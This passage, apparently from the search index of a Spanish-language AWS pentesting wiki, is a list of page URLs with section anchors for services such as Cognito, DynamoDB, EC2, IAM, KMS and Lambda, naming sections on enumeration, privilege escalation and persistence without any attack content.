ws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#aws---certificate-manager-acm--private-certificate-authority-pca","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#acm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#pcm","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#privesc","pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#aws---enumeración-de-cloudformation-y-codestar","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#cloudformation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#codestar","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#aws---cloudhsm-enum","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#hsm---módulo-de-seguridad-de-hardware","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#sugerencias-de-cloudhsm","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#qué-es-un-módulo-de-seguridad-de-hardware","pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#aws---cloudfront-enum","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#cloudfront","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#functions","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#aws---codebuild-enum","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#codebuild","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#credenciales-de-githubgitlabbitbucket","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#aws---cognito-enum","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#cognito","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#identity-pools---enumeración-no-autenticada","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#user-pools---enumeración-no-autenticada","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/index.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-identity-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#cognito-sync","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#tools-for-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#acceso-a-roles-de-iam","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#no-autenticado","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#flujo-de-autenticación-mejorado-vs-básico","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.html#autenticado","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#cognito-user-pools","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#ataques-potenciales","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#herramientas-para-pentesting","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#registro","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#verificando-el-registro","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#escalación-de-privilegios--actualización-de-atributos","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#recuperarcambiar-contraseña","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#autenticación","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#admin_no_srp_auth--admin_user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_password_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#user_srp_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#refresh_token_auth--refresh_token","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#custom_auth","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#seguridad-extra","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#seguridad-avanzada","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#mfa-recordar-dispositivo","pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.html#roles-iam-de-grupos-de-user-pool","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#aws---datapipeline-codepipeline--codecommit-enum","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#datapipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codepipeline","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#privesc-1","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#codecommit","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#enumeration-2","pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.html#referencias","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#aws---servicios-de-directorio--enumeración-de-workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#servicios-de-directorio","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#opciones","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#laboratorio","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#login","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privilege-escalation","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#using-an-ad-user","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#sharing-ad-from-victim-to-attacker","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#sharing-ad-from-attacker-to-victim","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#workdocs","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#aws---documentdb-enum","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#inyección-nosql","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#documentdb-1","pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#aws---enumeración-de-dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#cifrado","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#copias-de-seguridad-y-exportación-a-s3","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#gui","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#escalación-de-privilegios","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#inyección-en-dynamodb","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#inyección-sql","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#inyección-nosql","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#inyección-de-json-en-bruto","pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.html#property-injection","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#aws---ec2-ebs-elb-ssm-vpc-y-vpn-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpc-y-redes","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ec2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#perfiles-de-instancia","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#punto-de-metadata","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#escalación-de-privilegios","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#diferencia-ami--ebs","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#escalación-de-privilegios-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#ssm","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeración-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#privesc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#elb","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#plantillas-de-lanzamiento-y-grupos-de-escalado-automático","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeración-2","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#nitro","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeration-1","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#enumeración-local","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/index.html#referencias","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#aws---nitro-enum","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#instalación-de-nitro-enclave-cli","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#nitro-enclave-images","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#ejecutar-una-imagen","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#enumerar-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#terminar-enclaves","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsocks","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-serverlistener","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#cliente-vsock","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#vsock-proxy","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#atestación-de-nitro-enclave-y-kms","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#bypass-de-pcr","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws---vpc--networking-información-básica","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#aws-networking-en-resumen","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#subredes","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#tablas-de-rutas","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#acls","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#grupos-de-seguridad","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#direcciones-ip-elásticas","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#conexión-entre-subredes","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#emparejamiento-de-vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#registros-de-flujo-de-vpc","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#componentes-básicos-de-aws-vpn","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn-de-sitio-a-sitio","pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.html#vpn-del-cliente","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#aws---ecr-enum-1","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#ecr","pentesting-cloud/aws-security/aws-services/aws-ecr-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#aws---ecs-enum","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#ecs","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#datos-sensibles-en-las-definiciones-de-tareas","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#escalación-de-privilegios","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-ecs-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#aws---eks-enum","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#eks","pentesting-cloud/aws-security/aws-services/aws-eks-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aws---elastic-beanstalk-enum","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#aplicación-y-entornos","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#2-tipos-de-entornos","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#seguridad","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#exposición","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#escalación-de-privilegios","pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#aws---elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#elasticache","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-elasticache.html#privesc-todo","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#aws---emr-enum","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#emr","pentesting-cloud/aws-security/aws-services/aws-emr-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#aws---efs-enum","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#acceso-a-la-red","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#mount-efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#iam-access","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#puntos-de-acceso","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#dirección-ip-de-efs","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-efs-enum.html#persistence","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#aws---enumeración-del-programador-de-eventbridge","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#programador-de-eventbridge","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#programador-de-eventbridge-1","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#tipos-de-horarios","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#objetivos","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#privesc","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#aws---kinesis-data-firehose-enum","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#kinesis-data-firehose","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#post-explotación--evasión-de-defensa","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehosedeletedeliverystream","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseupdatedestination","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseputrecord--firehoseputrecordbatch","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#aws---iam-centro-de-identidad-y-enumeración-sso","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#fuerza-bruta-de-permisos","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#escalación-de-privilegios","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#post-explotación-de-iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#persistencia-de-iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#centro-de-identidad-de-iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#conectar-a-través-de-sso-con-cli","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeración-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeración-local","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#acceso-no-autenticado-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#escalación-de-privilegios-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#aws---kms-enum","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#kms---servicio-de-gestión-de-claves","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#políticas-de-clave","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#administradores-de-clave","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#rotación-de-cmks","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#otra-información-relevante-de-kms","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#aws---lambda-enum","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#pesos-de-alias-de-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#políticas-de-recursos","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#proxies-de-base-de-datos-de-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#sistemas-de-archivos-efs-de-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#capas-de-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#extensiones-de-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#invocar-una-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail-enum","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#analizar-instantáneas","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#metadatos","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#post-explotación","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#amazon-macie","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#introducción","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#listando-hallazgos-con-la-consola-de-aws","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#revelando-secretos","pentesting-cloud/aws-security/aws-services/aws-macie-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---mq-enum","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#amazon-mq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#introducción-a-los-intermediarios-de-mensajes","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---rabbitmq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---activemq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#aws---msk-enum","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#amazon-msk","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#tipos","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#acceso-iam-a-kafka-en-serverless","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#acceso-no-autenticado","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#persistencia","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#aws---organizations-enum","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#información-básica","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#referencias","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#aws---redshift-enum","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#amazon-redshift","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#kms","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#cloudhsm","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#enumeración","pentesting-cloud/aws-security/aws-services/aws-redshift-